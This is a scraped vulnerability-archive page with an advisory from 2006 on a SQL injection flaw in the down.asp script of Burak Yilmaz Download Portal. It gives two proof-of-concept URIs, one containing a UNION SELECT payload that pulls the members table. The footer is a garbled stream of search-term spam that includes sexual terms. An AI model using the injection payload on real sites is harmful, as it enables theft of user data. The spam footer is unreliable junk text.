about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive Talk

exploits , vulnerabilities , articles , Burak Yilmaz Download Portal Down.ASP SQL Injection Vulnerability


Title Burak Yilmaz Download Portal Down.ASP SQL Injection Vulnerability
Published 2006-12-19-12:00AM
Updated 2006-12-19-11:03PM
Class Input Validation Error
CVE  
Remote  Yes
Local  No
Credit  ShaFuck31 is credited with the discovery of this vulnerability.
Vulnerable  MaxiASP Burak Yilmaz Download Portal 0
Not Vulnerable  
Code   An attacker can exploit this issue via a web client.

The following proof-of-concept URIs are available:

http://www.example.com/ScriptPath/down.asp?id=[SqL]
http://www.example.com/ScriptPath/down.asp?id=-1%20union%20SELECT%20*%20FROM%20uyeler%20WHERE%20uid=36
TXT  t3xt 1t!


Advertising

Copyright 2007, SecurityDot
Fri, 18 Dec 2009 23:16:22 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
download e Mumthaj se t644t epmap (1 www.cscwz. virgin sex /search/ex Netgear DG Sexybabe moodle 1.7 www.j131.c v c d cart fuck vedie indian hot Bestiality vbulletin3 www.kar20. 200 /compo www.s1fw.c t57t 3gp sex vi celebrityx dmoz.im Abc 22 SEXXxxxx abs6726.5d Powered sgs KUMAR.SELV Www. www.tjwang httpd 2.0 Www. news for c you Video meli 200+%252Fc W.W.W.Free symbian hotmovie Sexy scenc redhat loc girls flashchat. www.beo.co maxcpm.inf www.beo.co Www...vulg yinshi8.0- www.beo.co